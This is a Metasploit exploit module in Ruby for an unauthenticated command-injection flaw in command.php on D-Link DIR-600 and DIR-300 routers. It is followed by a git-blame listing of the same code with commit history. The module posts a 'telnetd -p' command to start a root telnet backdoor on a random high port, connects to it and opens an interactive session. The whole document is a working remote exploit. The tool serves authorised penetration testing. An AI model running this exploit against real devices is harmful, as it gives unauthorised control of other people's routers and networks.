modules/exploits/linux/http/dlink_command_php_exec_noauth.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution',
      'Description' => %q{
        Various D-Link Routers are vulnerable to OS command injection via the web
        interface. The vulnerability exists in command.php, which is accessible without
        authentication. This module has been tested with the versions DIR-600 2.14b01,
        DIR-300 rev B 2.13.
      },
      'Author'      =>
        [
          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez' # minor help with msf module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'OSVDB', '89861' ],
          [ 'EDB', '24453' ],
          [ 'BID', '57734' ],
          [ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],
          [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
        ],
      'DisclosureDate' => '2013-02-04',
      'Privileged'     => true,
      'Platform'       => 'unix',
      'Arch'        => ARCH_CMD,
      'Payload'     =>
        {
          'Compat'  => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find',
          },
        },
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
      'Targets'        =>
        [
          [ 'Automatic',	{ } ]
        ],
      'DefaultTarget'  => 0
      ))

    register_advanced_options(
      [
        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),
        OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])
      ])

  end

  def tel_timeout
    (datastore['TelnetTimeout'] || 10).to_i
  end

  def banner_timeout
    (datastore['TelnetBannerTimeout'] || 25).to_i
  end

  def session_timeout
    (datastore['SessionTimeout'] || 10).to_i
  end

  def exploit
    telnetport = rand(32767) + 32768

    print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")

    cmd = "telnetd -p #{telnetport}"

    #starting the telnetd gives no response
    print_status("#{rhost}:#{rport} - Sending exploit request...")
    request(cmd)

    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
    ctx = { 'Msf' => framework, 'MsfExploit' => self }
    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })

    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
    end

    add_socket(sock)

    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
    prompt = negotiate_telnet(sock)
    if prompt.nil?
      sock.close
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
    else
      print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")
    end

    print_status("#{rhost}:#{rport} - Trying to create the Msf session...")
    begin
      Timeout.timeout(session_timeout) do
        activated = handler(sock)
        while(activated !~ /claimed/)
          activated = handler(sock)
        end
      end
    rescue ::Timeout::Error
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session")
    end
  end

  def request(cmd)

    uri = '/command.php'

    begin
      res = send_request_cgi({
        'uri'    => uri,
        'method' => 'POST',
        'vars_post' => {
          "cmd" => cmd
          }
      })
    return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end

  def negotiate_telnet(sock)
    begin
      Timeout.timeout(banner_timeout) do
        while(true)
          data = sock.get_once(-1, tel_timeout)
          return nil if not data or data.length == 0
          if data =~ /\x23\x20$/
            return true
          end
        end
      end
    rescue ::Timeout::Error
      return nil
    end
  end
end
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`Rank = ExcellentRanking`
Retab new material 2013-09-03 11:47:26 -05:00
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`include Msf::Exploit::Remote::HttpClient`
Retab new material 2013-09-03 11:47:26 -05:00
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'D-Link Devices Unauthenticated Remote Command Execution',`
			`'Description' => %q{`
Update descriptions for clarity. 2013-09-23 13:48:23 -05:00			`Various D-Link Routers are vulnerable to OS command injection via the web`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`interface. The vulnerability exists in command.php, which is accessible without`
			`authentication. This module has been tested with the versions DIR-600 2.14b01,`
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`DIR-300 rev B 2.13.`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`},`
			`'Author' =>`
			`[`
Fix email format 2014-07-11 12:45:23 -05:00			`'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`'juan vazquez' # minor help with msf module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '89861' ],`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`[ 'EDB', '24453' ],`
			`[ 'BID', '57734' ],`
			`[ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],`
			`[ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],`
			`[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2013-02-04',`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`'Privileged' => true,`
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`'Payload' =>`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`{`
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`'Compat' => {`
			`'PayloadType' => 'cmd_interact',`
			`'ConnectionType' => 'find',`
			`},`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`},`
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`'Targets' =>`
			`[`
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`[ 'Automatic', { } ]`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`],`
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`'DefaultTarget' => 0`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`))`
Retab new material 2013-09-03 11:47:26 -05:00
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`register_advanced_options(`
			`[`
			`OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),`
			`OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),`
			`OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab new material 2013-09-03 11:47:26 -05:00
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`end`
Retab new material 2013-09-03 11:47:26 -05:00
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`def tel_timeout`
			`(datastore['TelnetTimeout'] \|\| 10).to_i`
			`end`
Retab new material 2013-09-03 11:47:26 -05:00
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`def banner_timeout`
			`(datastore['TelnetBannerTimeout'] \|\| 25).to_i`
			`end`
Retab new material 2013-09-03 11:47:26 -05:00
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`def session_timeout`
			`(datastore['SessionTimeout'] \|\| 10).to_i`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`end`
Retab new material 2013-09-03 11:47:26 -05:00
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`def exploit`
Fix possible port conflict 2013-09-18 12:24:36 -05:00			`telnetport = rand(32767) + 32768`
Retab new material 2013-09-03 11:47:26 -05:00
Make exploit more print friendly 2013-08-07 10:21:14 -05:00			`print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")`
Retab new material 2013-09-03 11:47:26 -05:00
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`cmd = "telnetd -p #{telnetport}"`
Retab new material 2013-09-03 11:47:26 -05:00
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`#starting the telnetd gives no response`
Make exploit more print friendly 2013-08-07 10:21:14 -05:00			`print_status("#{rhost}:#{rport} - Sending exploit request...")`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`request(cmd)`
Retab new material 2013-09-03 11:47:26 -05:00
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")`
Add Context to rex sockets plus track them with add_socket 2013-09-18 12:39:08 -05:00			`ctx = { 'Msf' => framework, 'MsfExploit' => self }`
			`sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })`
Retab new material 2013-09-03 11:47:26 -05:00
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`if sock.nil?`
more failure reasons 2015-04-16 22:04:11 +02:00			`fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")`
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`end`
Retab new material 2013-09-03 11:47:26 -05:00
Add Context to rex sockets plus track them with add_socket 2013-09-18 12:39:08 -05:00			`add_socket(sock)`

Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")`
			`prompt = negotiate_telnet(sock)`
			`if prompt.nil?`
			`sock.close`
be consistent about naming 2015-04-16 21:44:56 +02:00			`fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")`
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`else`
			`print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")`
			`end`
Retab new material 2013-09-03 11:47:26 -05:00
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`print_status("#{rhost}:#{rport} - Trying to create the Msf session...")`
			`begin`
			`Timeout.timeout(session_timeout) do`
			`activated = handler(sock)`
			`while(activated !~ /claimed/)`
			`activated = handler(sock)`
			`end`
			`end`
			`rescue ::Timeout::Error`
be consistent about naming 2015-04-16 21:44:56 +02:00			`fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session")`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`end`
			`end`
Retab new material 2013-09-03 11:47:26 -05:00
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`def request(cmd)`
Retab new material 2013-09-03 11:47:26 -05:00
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`uri = '/command.php'`
Retab new material 2013-09-03 11:47:26 -05:00
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`begin`
			`res = send_request_cgi({`
			`'uri' => uri,`
			`'method' => 'POST',`
			`'vars_post' => {`
			`"cmd" => cmd`
			`}`
			`})`
			`return res`
			`rescue ::Rex::ConnectionError`
more failure reasons 2015-04-16 22:04:11 +02:00			`fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`end`
			`end`
Retab new material 2013-09-03 11:47:26 -05:00
Fix the way to get a session over a telnet connection 2013-08-27 11:38:49 -05:00			`def negotiate_telnet(sock)`
			`begin`
			`Timeout.timeout(banner_timeout) do`
			`while(true)`
			`data = sock.get_once(-1, tel_timeout)`
			`return nil if not data or data.length == 0`
			`if data =~ /\x23\x20$/`
			`return true`
			`end`
			`end`
			`end`
			`rescue ::Timeout::Error`
			`return nil`
			`end`
			`end`
dir 300 and 600 auxiliary module replacement 2013-08-05 22:28:59 +02:00			`end`